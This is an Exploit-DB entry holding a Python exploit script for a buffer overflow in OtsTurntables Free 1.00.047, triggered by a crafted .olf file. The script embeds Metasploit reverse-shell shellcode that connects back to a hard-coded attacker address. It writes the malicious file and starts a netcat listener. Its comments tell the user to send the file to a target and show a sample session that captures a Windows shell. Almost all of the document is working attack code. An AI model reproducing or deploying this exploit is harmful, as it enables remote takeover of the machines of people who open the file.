OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow

EDB-ID:

11475

CVE:

N/A

Author:

mr_me

Type:

local

Platform:

Windows

Published:

2010-02-16

#!/usr/bin/python
# 
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on:  Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz 
# bad chars: '\x00\x0a\xbd\x0d\x20'
#
# 		** For educational purposes only **
#
# ####################################################################
#
#		~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\OtsLabs\Lists>
#

import sys, os

def banner():
	print "|------------------------------------------------------------------|"
	print "|                         __               __                      |"
	print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
	print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
	print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
	print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
	print "|                                                                  |"	
	print "|-------------------------------------------------[ EIP Hunters ]--|"
	print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit"

if len(sys.argv) < 3:
	banner()
	print "[?] Usage: " + sys.argv[0] + " <port> <filename>"
	sys.exit(1)

port = sys.argv[1]
filename = sys.argv[2]

# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
 
shell = ("\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x47\x4b"
"\x25\x9a\x83\xeb\xfc\xe2\xf4\xbb\x21\xce\xd7\xaf\xb2\xda\x65"
"\xb8\x2b\xae\xf6\x63\x6f\xae\xdf\x7b\xc0\x59\x9f\x3f\x4a\xca"
"\x11\x08\x53\xae\xc5\x67\x4a\xce\xd3\xcc\x7f\xae\x9b\xa9\x7a"
"\xe5\x03\xeb\xcf\xe5\xee\x40\x8a\xef\x97\x46\x89\xce\x6e\x7c"
"\x1f\x01\xb2\x32\xae\xae\xc5\x63\x4a\xce\xfc\xcc\x47\x6e\x11"
"\x18\x57\x24\x71\x44\x67\xae\x13\x2b\x6f\x39\xfb\x84\x7a\xfe"
"\xfe\xcc\x08\x15\x11\x07\x47\xae\xea\x5b\xe6\xae\xda\x4f\x15"
"\x4d\x14\x09\x45\xc9\xca\xb8\x9d\x43\xc9\x21\x23\x16\xa8\x2f"
"\x3c\x56\xa8\x18\x1f\xda\x4a\x2f\x80\xc8\x66\x7c\x1b\xda\x4c"
"\x18\xc2\xc0\xfc\xc6\xa6\x2d\x98\x12\x21\x27\x65\x97\x23\xfc"
"\x93\xb2\xe6\x72\x65\x91\x18\x76\xc9\x14\x08\x76\xd9\x14\xb4"
"\xf5\xf2\x87\xe3\x27\x90\x21\x23\x34\xc6\x21\x18\xac\x7b\xd2"
"\x23\xc9\x63\xed\x2b\x72\x65\x91\x21\x35\xcb\x12\xb4\xf5\xfc"
"\x2d\x2f\x43\xf2\x24\x26\x4f\xca\x1e\x62\xe9\x13\xa0\x21\x61"
"\x13\xa5\x7a\xe5\x69\xed\xde\xac\x67\xb9\x09\x08\x64\x05\x67"
"\xa8\xe0\x7f\xe0\x8e\x31\x2f\x39\xdb\x29\x51\xb4\x50\xb2\xb8"
"\x9d\x7e\xcd\x15\x1a\x74\xcb\x2d\x4a\x74\xcb\x12\x1a\xda\x4a"
"\x2f\xe6\xfc\x9f\x89\x18\xda\x4c\x2d\xb4\xda\xad\xb8\x9b\x4d"
"\x7d\x3e\x8d\x5c\x65\x32\x4f\xda\x4c\xb8\x3c\xd9\x65\x97\x23"
"\xd5\x10\x43\x14\x76\x65\x91\xb4\xf5\x9a");

exploit = "\x41" * 900
exploit += "\xeb\x06\x90\x90"
exploit += "\x46\x79\x23\x01" # CALL DWORD PTR SS:[ESP+2c] 
exploit += "\x90" * 30
exploit += shell
exploit += "\x41" * (15000-len(exploit))

banner()
try:
	print "[+] Creating exploit file.."
	print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
	print "[+] Send " + filename + " to your target" 
	turntable = open(filename,'w');
	turntable.write(exploit);
	turntable.close();
	print "[+] Waiting for a shell on port: " + port
	os.system('nc -lvp ' + port) 
except:
	print "[-] Error: You do not have correct permissions.."